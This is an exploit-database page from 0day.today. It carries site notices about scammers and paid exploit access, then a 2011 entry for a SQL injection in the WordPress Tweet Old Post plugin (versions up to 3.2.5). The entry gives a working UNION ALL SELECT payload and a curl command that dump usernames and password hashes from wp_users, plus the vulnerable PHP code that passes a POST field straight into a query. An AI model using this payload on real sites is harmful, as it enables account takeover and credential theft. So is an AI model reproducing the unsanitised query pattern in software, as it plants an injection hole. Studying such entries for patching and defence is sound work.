0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection Vulnerability
# Exploit Title: WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection Vulnerability # Date: 2011-09-05 # Author: sherl0ck_ < sherl0ck_ [at] alligatorteam [dot] org > # Software Link: http://downloads.wordpress.org/plugin/tweet-old-post.zip # Version: 3.2.5 (tested) --------------- PoC (POST data) --------------- URL: http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts POST Data: delids=1&selFilter=excluded&cat=1=0) UNION ALL SELECT USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from wp_users#&setFilter=Filter&s=hello&chkbx=1 e.g.: curl --cookie "[COOKIE]" --data "delids=1&selFilter=excluded&cat=1) UNION ALL SELECT USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from wp_users#&setFilter=Filter&s=hello&chkbx=1" http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts --------------- Vulnerable code --------------- 70 if(isset($_POST["setFilter"])) 71 { 72 if($_POST["cat"] != 0) 73 { 74 $sql = $sql . " and p.ID IN ( SELECT tr.object_id FROM ".$wpdb->prefix."term_relationships AS tr INNER JOIN ".$wpdb->prefix."term_taxonomy AS tt ON tr.term_taxonomy_id = tt.ter m_taxonomy_id WHERE tt.taxonomy = 'category' AND tt.term_id=" . $_POST["cat"] . ")"; 75 $cat_filter = $_POST["cat"]; # 0day.today [2024-11-16] #